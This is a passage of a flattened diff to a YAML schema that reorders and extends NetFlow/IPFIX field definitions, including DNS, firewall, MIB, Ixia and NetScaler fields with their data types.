- name: mpls_vpn_route_distinguisher - type: short + - name: data_link_frame_size + type: integer - - name: mpls_top_label_prefix_length - type: short + - name: data_link_frame_type + type: integer - - name: src_traffic_index - type: long + - name: data_records_reliability + type: boolean - - name: dst_traffic_index + - name: delta_flow_count type: long - - name: application_description - type: keyword - - - name: application_id - type: short + - name: destination_ipv4_address + type: ip - - name: application_name - type: keyword + - name: destination_ipv4_prefix + type: ip - - name: post_ip_diff_serv_code_point + - name: destination_ipv4_prefix_length type: short - - name: multicast_replication_factor - type: long + - name: destination_ipv6_address + type: ip - - name: class_name - type: keyword + - name: destination_ipv6_prefix + type: ip - - name: classification_engine_id + - name: destination_ipv6_prefix_length type: short - - name: layer2packet_section_offset - type: integer + - name: destination_mac_address + type: keyword - - name: layer2packet_section_size + - name: destination_transport_port type: integer - - name: layer2packet_section_data - type: short - - - name: bgp_next_adjacent_as_number + - name: digest_hash_value type: long - - name: bgp_prev_adjacent_as_number + - name: distinct_count_of_destination_ip_address type: long - - name: exporter_ipv4_address - type: ip - - - name: exporter_ipv6_address - type: ip + - name: distinct_count_of_destination_ipv4_address + type: long - - name: dropped_octet_delta_count + - name: distinct_count_of_destination_ipv6_address type: long - - name: dropped_packet_delta_count + - name: distinct_count_of_source_ip_address type: long - - name: dropped_octet_total_count + - name: distinct_count_of_source_ipv4_address type: long - - name: dropped_packet_total_count + - name: distinct_count_of_source_ipv6_address type: long - - name: flow_end_reason + - name: dns_authoritative type: short - - name: common_properties_id - type: long + - name: dns_cname + type: keyword - - name: observation_point_id - type: long + - name: dns_id + type: integer - - name: icmp_type_code_ipv6 + - name: dns_mx_exchange + type: keyword + + - name: dns_mx_preference type: integer - - name: mpls_top_label_ipv6_address - type: ip + - name: dns_nsd_name + type: keyword - - name: line_card_id + - name: dns_nx_domain + type: short + + - name: dns_ptrd_name + type: keyword + + - name: dns_qname + type: keyword + + - name: dns_qr_type + type: integer + + - name: dns_query_response + type: short + + - name: dns_rr_section + type: short + + - name: dns_soa_expire type: long - - name: port_id + - name: dns_soa_minimum type: long - - name: metering_process_id + - name: dns_soa_refresh type: long - - name: exporting_process_id + - name: dns_soa_retry type: long - - name: template_id - type: integer + - name: dns_soa_serial + type: long - - name: wlan_channel_id - type: short + - name: dns_soam_name + type: keyword - - name: wlan_ssid + - name: dns_soar_name type: keyword - - name: flow_id - type: long + - name: dns_srv_port + type: integer - - name: observation_domain_id + - name: dns_srv_priority + type: integer + + - name: dns_srv_target + type: integer + + - name: dns_srv_weight + type: integer + + - name: dns_ttl type: long - - name: flow_start_seconds - type: date + - name: dns_txt_data + type: keyword - - name: flow_end_seconds - type: date + - name: dot1q_customer_dei + type: boolean - - name: flow_start_milliseconds - type: date + - name: dot1q_customer_destination_mac_address + type: keyword - - name: flow_end_milliseconds - type: date + - name: dot1q_customer_priority + type: short - - name: flow_start_microseconds - type: date + - name: dot1q_customer_source_mac_address + type: keyword - - name: flow_end_microseconds - type: date + - name: dot1q_customer_vlan_id + type: integer - - name: flow_start_nanoseconds - type: date + - name: dot1q_dei + type: boolean - - name: flow_end_nanoseconds - type: date + - name: dot1q_priority + type: short - - name: flow_start_delta_microseconds + - name: dot1q_service_instance_id type: long - - name: flow_end_delta_microseconds - type: long + - name: dot1q_service_instance_priority + type: short - - name: system_init_time_milliseconds - type: date + - name: dot1q_service_instance_tag + type: short - - name: flow_duration_milliseconds - type: long + - name: dot1q_vlan_id + type: integer - - name: flow_duration_microseconds + - name: dropped_layer2_octet_delta_count type: long - - name: observed_flow_total_count + - name: dropped_layer2_octet_total_count type: long - - name: ignored_packet_total_count + - name: dropped_octet_delta_count type: long - - name: ignored_octet_total_count + - name: dropped_octet_total_count type: long - - name: not_sent_flow_total_count + - name: dropped_packet_delta_count type: long - - name: not_sent_packet_total_count + - name: dropped_packet_total_count type: long - - name: not_sent_octet_total_count + - name: dst_traffic_index type: long - - name: destination_ipv6_prefix - type: ip - - - name: source_ipv6_prefix - type: ip + - name: egress_broadcast_packet_total_count + type: long - - name: post_octet_total_count + - name: egress_interface type: long - - name: post_packet_total_count + - name: egress_interface_type type: long - - name: flow_key_indicator + - name: egress_physical_interface type: long - - name: post_mcast_packet_total_count + - name: egress_unicast_packet_total_count type: long - - name: post_mcast_octet_total_count + - name: egress_vrfid type: long - - name: icmp_type_ipv4 - type: short + - name: encrypted_technology + type: keyword - - name: icmp_code_ipv4 + - name: engine_id type: short - - name: icmp_type_ipv6 + - name: engine_type type: short - - name: icmp_code_ipv6 + - name: ethernet_header_length type: short - - name: udp_source_port - type: integer - - - name: udp_destination_port + - name: ethernet_payload_length type: integer - - name: tcp_source_port + - name: ethernet_total_length type: integer - - name: tcp_destination_port + - name: ethernet_type type: integer - - name: tcp_sequence_number + - name: expired_fragment_count type: long - - name: tcp_acknowledgement_number + - name: export_interface type: long - - name: tcp_window_size - type: integer + - name: export_protocol_version + type: short - - name: tcp_urgent_pointer + - name: export_sctp_stream_id type: integer - - name: tcp_header_length + - name: export_transport_protocol type: short - - name: ip_header_length - type: short + - name: exported_flow_record_total_count + type: long - - name: total_length_ipv4 - type: integer + - name: exported_message_total_count + type: long - - name: payload_length_ipv6 - type: integer + - name: exported_octet_total_count + type: long - - name: ip_ttl + - name: exporter_certificate type: short - - name: next_header_ipv6 - type: short + - name: exporter_ipv4_address + type: ip - - name: mpls_payload_length + - name: exporter_ipv6_address + type: ip + + - name: exporter_transport_port + type: integer + + - name: exporting_process_id type: long - - name: ip_diff_serv_code_point + - name: external_address_realm type: short - - name: ip_precedence + - name: firewall_event type: short - - name: fragment_flags + - name: first_eight_non_empty_packet_directions type: short - - name: octet_delta_sum_of_squares - type: long - - - name: octet_total_sum_of_squares - type: long - - - name: mpls_top_label_ttl - type: short + - name: first_non_empty_packet_size + type: integer - - name: mpls_label_stack_length - type: long + - name: first_packet_banner + type: keyword - - name: mpls_label_stack_depth + - name: flags_and_sampler_id type: long - - name: mpls_top_label_exp - type: short - - - name: ip_payload_length - type: long + - name: flow_active_timeout + type: integer - - name: udp_message_length + - name: flow_attributes type: integer - - name: is_multicast + - name: flow_direction type: short - - name: ipv4_ihl - type: short + - name: flow_duration_microseconds + type: long - - name: ipv4_options + - name: flow_duration_milliseconds type: long - - name: tcp_options + - name: flow_end_delta_microseconds type: long - - name: padding_octets - type: short + - name: flow_end_microseconds + type: date - - name: collector_ipv4_address - type: ip - - - name: collector_ipv6_address - type: ip + - name: flow_end_milliseconds + type: date - - name: export_interface - type: long + - name: flow_end_nanoseconds + type: date - - name: export_protocol_version + - name: flow_end_reason type: short - - name: export_transport_protocol - type: short + - name: flow_end_seconds + type: date - - name: collector_transport_port - type: integer + - name: flow_end_sys_up_time + type: long - - name: exporter_transport_port + - name: flow_id + type: long + + - name: flow_idle_timeout type: integer - - name: tcp_syn_total_count + - name: flow_key_indicator type: long - - name: tcp_fin_total_count + - name: flow_label_ipv6 type: long - - name: tcp_rst_total_count + - name: flow_sampling_time_interval type: long - - name: tcp_psh_total_count + - name: flow_sampling_time_spacing type: long - - name: tcp_ack_total_count + - name: flow_selected_flow_delta_count type: long - - name: tcp_urg_total_count + - name: flow_selected_octet_delta_count type: long - - name: ip_total_length + - name: flow_selected_packet_delta_count type: long - - name: post_nat_source_ipv4_address - type: ip + - name: flow_selector_algorithm + type: integer - - name: post_nat_destination_ipv4_address - type: ip + - name: flow_start_delta_microseconds + type: long - - name: post_napt_source_transport_port - type: integer + - name: flow_start_microseconds + type: date - - name: post_napt_destination_transport_port - type: integer + - name: flow_start_milliseconds + type: date - - name: nat_originating_address_realm - type: short + - name: flow_start_nanoseconds + type: date - - name: nat_event - type: short + - name: flow_start_seconds + type: date - - name: initiator_octets + - name: flow_start_sys_up_time type: long - - name: responder_octets + - name: flow_table_flush_event_count type: long - - name: firewall_event + - name: flow_table_peak_count + type: long + + - name: forwarding_status type: short - - name: ingress_vrfid - type: long + - name: fragment_flags + type: short - - name: egress_vrfid + - name: fragment_identification type: long - - name: vr_fname - type: keyword + - name: fragment_offset + type: integer - - name: post_mpls_top_label_exp - type: short + - name: fw_blackout_secs + type: long - - name: tcp_window_scale - type: integer + - name: fw_configured_value + type: long - - name: biflow_direction - type: short + - name: fw_cts_src_sgt + type: long - - name: ethernet_header_length - type: short + - name: fw_event_level + type: long - - name: ethernet_payload_length - type: integer + - name: fw_event_level_id + type: long - - name: ethernet_total_length + - name: fw_ext_event type: integer - - name: dot1q_vlan_id - type: integer + - name: fw_ext_event_alt + type: long - - name: dot1q_priority - type: short + - name: fw_ext_event_desc + type: keyword - - name: dot1q_customer_vlan_id - type: integer + - name: fw_half_open_count + type: long - - name: dot1q_customer_priority - type: short + - name: fw_half_open_high + type: long - - name: metro_evc_id - type: keyword + - name: fw_half_open_rate + type: long - - name: metro_evc_type - type: short + - name: fw_max_sessions + type: long - - name: pseudo_wire_id + - name: fw_rule + type: keyword + + - name: fw_summary_pkt_count type: long - - name: pseudo_wire_type - type: integer + - name: fw_zone_pair_id + type: long - - name: pseudo_wire_control_word + - name: fw_zone_pair_name type: long - - name: ingress_physical_interface + - name: global_address_mapping_high_threshold type: long - - name: egress_physical_interface + - name: gre_key type: long - - name: post_dot1q_vlan_id - type: integer + - name: hash_digest_output + type: boolean - - name: post_dot1q_customer_vlan_id + - name: hash_flow_domain type: integer - - name: ethernet_type - type: integer + - name: hash_initialiser_value + type: long - - name: post_ip_precedence - type: short + - name: hash_ip_payload_offset + type: long - - name: collection_time_milliseconds - type: date + - name: hash_ip_payload_size + type: long - - name: export_sctp_stream_id - type: integer + - name: hash_output_range_max + type: long - - name: max_export_seconds - type: date + - name: hash_output_range_min + type: long - - name: max_flow_end_seconds - type: date + - name: hash_selected_range_max + type: long - - name: message_md5_checksum - type: short + - name: hash_selected_range_min + type: long - - name: message_scope - type: short + - name: http_content_type + type: keyword - - name: min_export_seconds - type: date + - name: http_message_version + type: keyword - - name: min_flow_start_seconds - type: date + - name: http_reason_phrase + type: keyword - - name: opaque_octets - type: short + - name: http_request_host + type: keyword - - name: session_scope - type: short + - name: http_request_method + type: keyword - - name: max_flow_end_microseconds - type: date + - name: http_request_target + type: keyword - - name: max_flow_end_milliseconds - type: date + - name: http_status_code + type: integer - - name: max_flow_end_nanoseconds - type: date + - name: http_user_agent + type: keyword - - name: min_flow_start_microseconds - type: date + - name: icmp_code_ipv4 + type: short - - name: min_flow_start_milliseconds - type: date + - name: icmp_code_ipv6 + type: short - - name: min_flow_start_nanoseconds - type: date + - name: icmp_type_code_ipv4 + type: integer - - name: collector_certificate - type: short + - name: icmp_type_code_ipv6 + type: integer - - name: exporter_certificate + - name: icmp_type_ipv4 type: short - - name: data_records_reliability - type: boolean + - name: icmp_type_ipv6 + type: short - - name: observation_point_type + - name: igmp_type type: short - - name: new_connection_delta_count + - name: ignored_data_record_total_count type: long - - name: connection_sum_duration_seconds + - name: ignored_layer2_frame_total_count type: long - - name: connection_transaction_id + - name: ignored_layer2_octet_total_count type: long - - name: post_nat_source_ipv6_address - type: ip - - - name: post_nat_destination_ipv6_address - type: ip + - name: ignored_octet_total_count + type: long - - name: nat_pool_id + - name: ignored_packet_total_count type: long - - name: nat_pool_name - type: keyword + - name: information_element_data_type + type: short - - name: anonymization_flags - type: integer + - name: information_element_description + type: keyword - - name: anonymization_technique + - name: information_element_id type: integer - name: information_element_index type: integer - - name: p2p_technology + - name: information_element_name type: keyword - - name: tunnel_technology - type: keyword + - name: information_element_range_begin + type: long - - name: encrypted_technology - type: keyword + - name: information_element_range_end + type: long - - name: bgp_validity_state + - name: information_element_semantics type: short - - name: ip_sec_spi - type: long + - name: information_element_units + type: integer - - name: gre_key + - name: ingress_broadcast_packet_total_count type: long - - name: nat_type - type: short - - - name: initiator_packets + - name: ingress_interface type: long - - name: responder_packets + - name: ingress_interface_type type: long - - name: observation_domain_name - type: keyword - - - name: selection_sequence_id + - name: ingress_multicast_packet_total_count type: long - - name: selector_id + - name: ingress_physical_interface type: long - - name: information_element_id - type: integer - - - name: selector_algorithm - type: integer - - - name: sampling_packet_interval + - name: ingress_unicast_packet_total_count type: long - - name: sampling_packet_space + - name: ingress_vrfid type: long - - name: sampling_time_interval - type: long + - name: initial_tcp_flags + type: short - - name: sampling_time_space + - name: initiator_octets type: long - - name: sampling_size + - name: initiator_packets type: long - - name: sampling_population - type: long + - name: interface_description + type: keyword - - name: sampling_probability - type: double + - name: interface_name + type: keyword - - name: data_link_frame_size - type: integer + - name: intermediate_process_id + type: long - - name: ip_header_packet_section + - name: internal_address_realm type: short - - name: ip_payload_packet_section + - name: ip_class_of_service type: short - - name: data_link_frame_section + - name: ip_diff_serv_code_point type: short - - name: mpls_label_stack_section + - name: ip_header_length type: short - - name: mpls_payload_packet_section + - name: ip_header_packet_section type: short - - name: selector_id_total_pkts_observed - type: long + - name: ip_next_hop_ipv4_address + type: ip - - name: selector_id_total_pkts_selected - type: long + - name: ip_next_hop_ipv6_address + type: ip - - name: absolute_error - type: double + - name: ip_payload_length + type: long - - name: relative_error - type: double + - name: ip_payload_packet_section + type: short - - name: observation_time_seconds - type: date + - name: ip_precedence + type: short - - name: observation_time_milliseconds - type: date + - name: ip_sec_spi + type: long - - name: observation_time_microseconds - type: date + - name: ip_total_length + type: long - - name: observation_time_nanoseconds - type: date + - name: ip_ttl + type: short - - name: digest_hash_value - type: long + - name: ip_version + type: short - - name: hash_ip_payload_offset - type: long + - name: ipv4_ihl + type: short - - name: hash_ip_payload_size + - name: ipv4_options type: long - - name: hash_output_range_min - type: long + - name: ipv4_router_sc + type: ip - - name: hash_output_range_max + - name: ipv6_extension_headers type: long - - name: hash_selected_range_min - type: long + - name: is_multicast + type: short - - name: hash_selected_range_max - type: long + - name: ixia_browser_id + type: short - - name: hash_digest_output - type: boolean + - name: ixia_browser_name + type: keyword - - name: hash_initialiser_value - type: long + - name: ixia_device_id + type: short - - name: selector_name + - name: ixia_device_name type: keyword - - name: upper_ci_limit - type: double + - name: ixia_dns_answer + type: keyword - - name: lower_ci_limit - type: double + - name: ixia_dns_classes + type: keyword - - name: confidence_level - type: double + - name: ixia_dns_query + type: keyword - - name: information_element_data_type - type: short + - name: ixia_dns_record_txt + type: keyword - - name: information_element_description + - name: ixia_dst_as_name type: keyword - - name: information_element_name + - name: ixia_dst_city_name type: keyword - - name: information_element_range_begin - type: long + - name: ixia_dst_country_code + type: keyword - - name: information_element_range_end - type: long + - name: ixia_dst_country_name + type: keyword - - name: information_element_semantics - type: short + - name: ixia_dst_latitude + type: float - - name: information_element_units - type: integer + - name: ixia_dst_longitude + type: float - - name: private_enterprise_number - type: long + - name: ixia_dst_region_code + type: keyword - - name: virtual_station_interface_id - type: short + - name: ixia_dst_region_node + type: keyword - - name: virtual_station_interface_name + - name: ixia_encrypt_cipher type: keyword - - name: virtual_station_uuid - type: short + - name: ixia_encrypt_key_length + type: integer - - name: virtual_station_name + - name: ixia_encrypt_type type: keyword - - name: layer2_segment_id - type: long + - name: ixia_http_host_name + type: keyword - - name: layer2_octet_delta_count - type: long + - name: ixia_http_uri + type: keyword - - name: layer2_octet_total_count - type: long + - name: ixia_http_user_agent + type: keyword - - name: ingress_unicast_packet_total_count - type: long + - name: ixia_imsi_subscriber + type: keyword - - name: ingress_multicast_packet_total_count + - name: ixia_l7_app_id type: long - - name: ingress_broadcast_packet_total_count - type: long + - name: ixia_l7_app_name + type: keyword - - name: egress_unicast_packet_total_count + - name: ixia_latency type: long - - name: egress_broadcast_packet_total_count + - name: ixia_rev_octet_delta_count type: long - - name: monitoring_interval_start_milli_seconds - type: date - - - name: monitoring_interval_end_milli_seconds - type: date - - - name: port_range_start - type: integer - - - name: port_range_end - type: integer - - - name: port_range_step_size - type: integer - - - name: port_range_num_ports - type: integer + - name: ixia_rev_packet_delta_count + type: long - - name: sta_mac_address + - name: ixia_src_as_name type: keyword - - name: sta_ipv4_address - type: ip + - name: ixia_src_city_name + type: keyword - - name: wtp_mac_address + - name: ixia_src_country_code type: keyword - - name: ingress_interface_type - type: long + - name: ixia_src_country_name + type: keyword - - name: egress_interface_type - type: long + - name: ixia_src_latitude + type: float - - name: rtp_sequence_number - type: integer + - name: ixia_src_longitude + type: float - - name: user_name + - name: ixia_src_region_code type: keyword - - name: application_category_name + - name: ixia_src_region_name type: keyword - - name: application_sub_category_name - type: keyword + - name: ixia_threat_ipv4 + type: ip - - name: application_group_name - type: keyword + - name: ixia_threat_ipv6 + type: ip - - name: original_flows_present - type: long + - name: ixia_threat_type + type: keyword - - name: original_flows_initiated + - name: large_packet_count type: long - - name: original_flows_completed + - name: layer2_frame_delta_count type: long - - name: distinct_count_of_source_ip_address + - name: layer2_frame_total_count type: long - - name: distinct_count_of_destination_ip_address + - name: layer2_octet_delta_count type: long - - name: distinct_count_of_source_ipv4_address + - name: layer2_octet_delta_sum_of_squares type: long - - name: distinct_count_of_destination_ipv4_address + - name: layer2_octet_total_count type: long - - name: distinct_count_of_source_ipv6_address + - name: layer2_octet_total_sum_of_squares type: long - - name: distinct_count_of_destination_ipv6_address + - name: layer2_segment_id type: long - - name: value_distribution_method + - name: layer2packet_section_data type: short - - name: rfc3550_jitter_milliseconds - type: long + - name: layer2packet_section_offset + type: integer - - name: rfc3550_jitter_microseconds - type: long + - name: layer2packet_section_size + type: integer - - name: rfc3550_jitter_nanoseconds + - name: line_card_id type: long - - name: dot1q_dei - type: boolean - - - name: dot1q_customer_dei - type: boolean - - - name: flow_selector_algorithm - type: integer + - name: log_op + type: short - - name: flow_selected_octet_delta_count - type: long + - name: lower_ci_limit + type: double - - name: flow_selected_packet_delta_count + - name: mark type: long - - name: flow_selected_flow_delta_count + - name: max_bib_entries type: long - - name: selector_id_total_flows_observed + - name: max_entries_per_user type: long - - name: selector_id_total_flows_selected + - name: max_export_seconds + type: date + + - name: max_flow_end_microseconds + type: date + + - name: max_flow_end_milliseconds + type: date + + - name: max_flow_end_nanoseconds + type: date + + - name: max_flow_end_seconds + type: date + + - name: max_fragments_pending_reassembly + type: long + + - name: max_packet_size + type: integer + + - name: max_session_entries + type: long + + - name: max_subscribers + type: long + + - name: maximum_ip_total_length + type: long + + - name: maximum_layer2_total_length + type: long + + - name: maximum_ttl + type: short + + - name: mean_flow_rate + type: long + + - name: mean_packet_rate + type: long + + - name: message_md5_checksum + type: short + + - name: message_scope + type: short + + - name: metering_process_id + type: long + + - name: metro_evc_id + type: keyword + + - name: metro_evc_type + type: short + + - name: mib_capture_time_semantics + type: short + + - name: mib_context_engine_id + type: short + + - name: mib_context_name + type: keyword + + - name: mib_index_indicator + type: long + + - name: mib_module_name + type: keyword + + - name: mib_object_description + type: keyword + + - name: mib_object_identifier + type: short + + - name: mib_object_name + type: keyword + + - name: mib_object_syntax + type: keyword + + - name: mib_object_value_bits + type: short + + - name: mib_object_value_counter + type: long + + - name: mib_object_value_gauge + type: long + + - name: mib_object_value_integer + type: integer + + - name: mib_object_value_ip_address + type: ip + + - name: mib_object_value_octet_string + type: short + + - name: mib_object_value_oid + type: short + + - name: mib_object_value_time_ticks + type: long + + - name: mib_object_value_unsigned + type: long + + - name: mib_sub_identifier + type: long + + - name: min_export_seconds + type: date + + - name: min_flow_start_microseconds + type: date + + - name: min_flow_start_milliseconds + type: date + + - name: min_flow_start_nanoseconds + type: date + + - name: min_flow_start_seconds + type: date + + - name: minimum_ip_total_length + type: long + + - name: minimum_layer2_total_length + type: long + + - name: minimum_ttl + type: short + + - name: mobile_imsi + type: keyword + + - name: mobile_msisdn + type: keyword + + - name: monitoring_interval_end_milli_seconds + type: date + + - name: monitoring_interval_start_milli_seconds + type: date + + - name: mpls_label_stack_depth + type: long + + - name: mpls_label_stack_length + type: long + + - name: mpls_label_stack_section + type: short + + - name: mpls_label_stack_section10 + type: short + + - name: mpls_label_stack_section2 + type: short + + - name: mpls_label_stack_section3 + type: short + + - name: mpls_label_stack_section4 + type: short + + - name: mpls_label_stack_section5 + type: short + + - name: mpls_label_stack_section6 + type: short + + - name: mpls_label_stack_section7 + type: short + + - name: mpls_label_stack_section8 + type: short + + - name: mpls_label_stack_section9 + type: short + + - name: mpls_payload_length + type: long + + - name: mpls_payload_packet_section + type: short + + - name: mpls_top_label_exp + type: short + + - name: mpls_top_label_ipv4_address + type: ip + + - name: mpls_top_label_ipv6_address + type: ip + + - name: mpls_top_label_prefix_length + type: short + + - name: mpls_top_label_stack_section + type: short + + - name: mpls_top_label_ttl + type: short + + - name: mpls_top_label_type + type: short + + - name: mpls_vpn_route_distinguisher + type: short + + - name: mptcp_address_id + type: short + + - name: mptcp_flags + type: short + + - name: mptcp_initial_data_sequence_number + type: long + + - name: mptcp_maximum_segment_size + type: integer + + - name: mptcp_receiver_token + type: long + + - name: multicast_replication_factor + type: long + + - name: nat_event + type: short + + - name: nat_inside_svcid + type: integer + + - name: nat_instance_id + type: long + + - name: nat_originating_address_realm + type: short + + - name: nat_outside_svcid + type: integer + + - name: nat_pool_id + type: long + + - name: nat_pool_name + type: keyword + + - name: nat_quota_exceeded_event + type: long + + - name: nat_sub_string + type: keyword + + - name: nat_threshold_event + type: long + + - name: nat_type + type: short + + - name: netscale_ica_client_version + type: keyword + + - name: netscaler_aaa_username + type: keyword + + - name: netscaler_app_name + type: keyword + + - name: netscaler_app_name_app_id + type: long + + - name: netscaler_app_name_incarnation_number + type: long + + - name: netscaler_app_template_name + type: keyword + + - name: netscaler_app_unit_name_app_id + type: long + + - name: netscaler_application_startup_duration + type: long + + - name: netscaler_application_startup_time + type: long + + - name: netscaler_cache_redir_client_connection_core_id + type: long + + - name: netscaler_cache_redir_client_connection_transaction_id + type: long + + - name: netscaler_client_rtt + type: long + + - name: netscaler_connection_chain_hop_count + type: long + + - name: netscaler_connection_chain_id + type: short + + - name: netscaler_connection_id + type: long + + - name: netscaler_current_license_consumed + type: long + + - name: netscaler_db_clt_host_name + type: keyword + + - name: netscaler_db_database_name + type: keyword + + - name: netscaler_db_login_flags + type: long + + - name: netscaler_db_protocol_name + type: short + + - name: netscaler_db_req_string + type: keyword + + - name: netscaler_db_req_type + type: short + + - name: netscaler_db_resp_length + type: long + + - name: netscaler_db_resp_status + type: long + + - name: netscaler_db_resp_status_string + type: keyword + + - name: netscaler_db_user_name + type: keyword + + - name: netscaler_flow_flags + type: long + + - name: netscaler_http_client_interaction_end_time + type: keyword + + - name: netscaler_http_client_interaction_start_time + type: keyword + + - name: netscaler_http_client_render_end_time + type: keyword + + - name: netscaler_http_client_render_start_time + type: keyword + + - name: netscaler_http_content_type + type: keyword + + - name: netscaler_http_domain_name + type: keyword + + - name: netscaler_http_req_authorization + type: keyword + + - name: netscaler_http_req_cookie + type: keyword + + - name: netscaler_http_req_forw_fb + type: long + + - name: netscaler_http_req_forw_lb + type: long + + - name: netscaler_http_req_host + type: keyword + + - name: netscaler_http_req_method + type: keyword + + - name: netscaler_http_req_rcv_fb + type: long + + - name: netscaler_http_req_rcv_lb + type: long + + - name: netscaler_http_req_referer + type: keyword + + - name: netscaler_http_req_url + type: keyword + + - name: netscaler_http_req_user_agent + type: keyword + + - name: netscaler_http_req_via + type: keyword + + - name: netscaler_http_req_xforwarded_for + type: keyword + + - name: netscaler_http_res_forw_fb + type: long + + - name: netscaler_http_res_forw_lb + type: long + + - name: netscaler_http_res_location + type: keyword + + - name: netscaler_http_res_rcv_fb + type: long + + - name: netscaler_http_res_rcv_lb + type: long + + - name: netscaler_http_res_set_cookie + type: keyword + + - name: netscaler_http_res_set_cookie2 + type: keyword + + - name: netscaler_http_rsp_len + type: long + + - name: netscaler_http_rsp_status + type: integer + + - name: netscaler_ica_app_module_path + type: keyword + + - name: netscaler_ica_app_process_id + type: long + + - name: netscaler_ica_application_name + type: keyword + + - name: netscaler_ica_application_termination_time + type: long + + - name: netscaler_ica_application_termination_type + type: integer + + - name: netscaler_ica_channel_id1 + type: long + + - name: netscaler_ica_channel_id1_bytes + type: long + + - name: netscaler_ica_channel_id2 + type: long + + - name: netscaler_ica_channel_id2_bytes + type: long + + - name: netscaler_ica_channel_id3 + type: long + + - name: netscaler_ica_channel_id3_bytes + type: long + + - name: netscaler_ica_channel_id4 + type: long + + - name: netscaler_ica_channel_id4_bytes + type: long + + - name: netscaler_ica_channel_id5 + type: long + + - name: netscaler_ica_channel_id5_bytes + type: long + + - name: netscaler_ica_client_host_name + type: keyword + + - name: netscaler_ica_client_ip + type: ip + + - name: netscaler_ica_client_launcher + type: integer + + - name: netscaler_ica_client_side_rto_count + type: integer + + - name: netscaler_ica_client_side_window_size + type: integer + + - name: netscaler_ica_client_type + type: integer + + - name: netscaler_ica_clientside_delay + type: long + + - name: netscaler_ica_clientside_jitter + type: long + + - name: netscaler_ica_clientside_packets_retransmit + type: integer + + - name: netscaler_ica_clientside_rtt + type: long + + - name: netscaler_ica_clientside_rx_bytes + type: long + + - name: netscaler_ica_clientside_srtt + type: long + + - name: netscaler_ica_clientside_tx_bytes + type: long + + - name: netscaler_ica_connection_priority + type: integer + + - name: netscaler_ica_device_serial_no + type: long + + - name: netscaler_ica_domain_name + type: keyword + + - name: netscaler_ica_flags + type: long + + - name: netscaler_ica_host_delay + type: long + + - name: netscaler_ica_l7_client_latency + type: long + + - name: netscaler_ica_l7_server_latency + type: long + + - name: netscaler_ica_launch_mechanism + type: integer + + - name: netscaler_ica_network_update_end_time + type: long + + - name: netscaler_ica_network_update_start_time + type: long + + - name: netscaler_ica_rtt + type: long + + - name: netscaler_ica_server_name + type: keyword + + - name: netscaler_ica_server_side_rto_count + type: integer + + - name: netscaler_ica_server_side_window_size + type: integer + + - name: netscaler_ica_serverside_delay + type: long + + - name: netscaler_ica_serverside_jitter + type: long + + - name: netscaler_ica_serverside_packets_retransmit + type: integer + + - name: netscaler_ica_serverside_rtt + type: long + + - name: netscaler_ica_serverside_srtt + type: long + + - name: netscaler_ica_session_end_time + type: long + + - name: netscaler_ica_session_guid + type: short + + - name: netscaler_ica_session_reconnects + type: short + + - name: netscaler_ica_session_setup_time + type: long + + - name: netscaler_ica_session_update_begin_sec + type: long + + - name: netscaler_ica_session_update_end_sec + type: long + + - name: netscaler_ica_username + type: keyword + + - name: netscaler_license_type + type: short + + - name: netscaler_main_page_core_id + type: long + + - name: netscaler_main_page_id + type: long + + - name: netscaler_max_license_count + type: long + + - name: netscaler_msi_client_cookie + type: short + + - name: netscaler_round_trip_time + type: long + + - name: netscaler_server_ttfb + type: long + + - name: netscaler_server_ttlb + type: long + + - name: netscaler_syslog_message + type: keyword + + - name: netscaler_syslog_priority + type: short + + - name: netscaler_syslog_timestamp + type: long + + - name: netscaler_transaction_id + type: long + + - name: netscaler_unknown270 + type: long + + - name: netscaler_unknown271 + type: long + + - name: netscaler_unknown272 + type: long + + - name: netscaler_unknown273 + type: long + + - name: netscaler_unknown274 + type: long + + - name: netscaler_unknown275 + type: long + + - name: netscaler_unknown276 + type: long + + - name: netscaler_unknown277 + type: long + + - name: netscaler_unknown278 + type: long + + - name: netscaler_unknown279 + type: long + + - name: netscaler_unknown280 + type: long + + - name: netscaler_unknown281 + type: long + + - name: netscaler_unknown282 + type: long + + - name: netscaler_unknown283 + type: long + + - name: netscaler_unknown284 + type: long + + - name: netscaler_unknown285 + type: long + + - name: netscaler_unknown286 + type: long + + - name: netscaler_unknown287 + type: long + + - name: netscaler_unknown288 + type: long + + - name: netscaler_unknown289 + type: long + + - name: netscaler_unknown290 + type: long + + - name: netscaler_unknown291 + type: long + + - name: netscaler_unknown292 + type: long + + - name: netscaler_unknown293 + type: long + + - name: netscaler_unknown294 + type: long + + - name: netscaler_unknown295 + type: long + + - name: netscaler_unknown296 + type: long + + - name: netscaler_unknown297 + type: long + + - name: netscaler_unknown298 + type: long + + - name: netscaler_unknown299 + type: long + + - name: netscaler_unknown300 + type: long + + - name: netscaler_unknown301 + type: long + + - name: netscaler_unknown302 + type: long + + - name: netscaler_unknown303 + type: long + + - name: netscaler_unknown304 + type: long + + - name: netscaler_unknown305 + type: long + + - name: netscaler_unknown306 + type: long + + - name: netscaler_unknown307 + type: long + + - name: netscaler_unknown308 + type: long + + - name: netscaler_unknown309 + type: long + + - name: netscaler_unknown310 + type: long + + - name: netscaler_unknown311 + type: long + + - name: netscaler_unknown312 + type: long + + - name: netscaler_unknown313 + type: long + + - name: netscaler_unknown314 + type: long + + - name: netscaler_unknown315 + type: long + + - name: netscaler_unknown316 + type: keyword + + - name: netscaler_unknown317 + type: long + + - name: netscaler_unknown318 + type: long + + - name: netscaler_unknown319 + type: keyword + + - name: netscaler_unknown320 + type: integer + + - name: netscaler_unknown321 + type: long + + - name: netscaler_unknown322 + type: long + + - name: netscaler_unknown323 + type: integer + + - name: netscaler_unknown324 + type: integer + + - name: netscaler_unknown325 + type: integer + + - name: netscaler_unknown326 + type: integer + + - name: netscaler_unknown327 + type: long + + - name: netscaler_unknown328 + type: integer + + - name: netscaler_unknown329 + type: integer + + - name: netscaler_unknown330 + type: integer + + - name: netscaler_unknown331 + type: integer + + - name: netscaler_unknown332 + type: long + + - name: netscaler_unknown333 + type: keyword + + - name: netscaler_unknown334 + type: keyword + + - name: netscaler_unknown335 + type: long + + - name: netscaler_unknown336 + type: long + + - name: netscaler_unknown337 + type: long + + - name: netscaler_unknown338 + type: long + + - name: netscaler_unknown339 + type: long + + - name: netscaler_unknown340 + type: long + + - name: netscaler_unknown341 + type: long + + - name: netscaler_unknown342 + type: long + + - name: netscaler_unknown343 + type: long + + - name: netscaler_unknown344 + type: long + + - name: netscaler_unknown345 + type: long + + - name: netscaler_unknown346 + type: long + + - name: netscaler_unknown347 + type: long + + - name: netscaler_unknown348 + type: integer + + - name: netscaler_unknown349 + type: keyword + + - name: netscaler_unknown350 + type: keyword + + - name: netscaler_unknown351 + type: keyword + + - name: netscaler_unknown352 